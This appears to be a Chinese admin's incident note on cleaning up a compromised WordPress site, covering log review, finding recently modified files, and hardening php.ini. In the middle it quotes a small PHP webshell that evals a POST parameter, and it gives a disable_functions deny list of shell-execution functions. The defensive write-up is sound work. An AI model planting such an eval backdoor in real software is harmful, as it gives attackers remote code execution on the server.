【linux命令】2016.5.14 服务器和网站遭受攻击

2，查看web。
（1）写探针测试环境，环境请求正常。那网站500报错应该是程序错误了。下一步转移方向查web日志。
（2）查看web无非就是查看请求报错日志了。查看nginx错误日志，发现网站果然是一堆500，报错都是多了一个函数<?php get_header(); ?> 无法调用，导致全站所有url崩溃。那应该是程序被搞了。
（3）根据报错定位到的是首页文件，先删除恢复正常。可以访问了，但是蜘蛛测试模拟依旧是500，怪不得收录也受影响了。想想应该没有这么简单，然后根据内容修改时间

find / -mmin 30 -print

进行文件排序，定位到了主题下的header.php和防垃圾评论插件被篡改了。这个自带插件一直没用，wordpress提示更新的时候也没有管，现在出问题了，好忧伤，也长教训。防垃圾插件成了一个webshell，直接删除这个插件和删除header.php多的内容：

 ?php
error_reporting(0);
$uid=$_POST['live'];
@eval("$getnum = $uid;"); 
?。。。

暂时查到这里处理完都恢复正常了，明天还需要找做php开发的朋友详细给检查下。
（4）调整php.ini 禁用一些函数.
disable_functions :eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
（5）顺便调整网站目录权限。并对关键文件设置chattr保护。
（6）打包备份网站数据一份。

再运行观察一下吧，睡觉。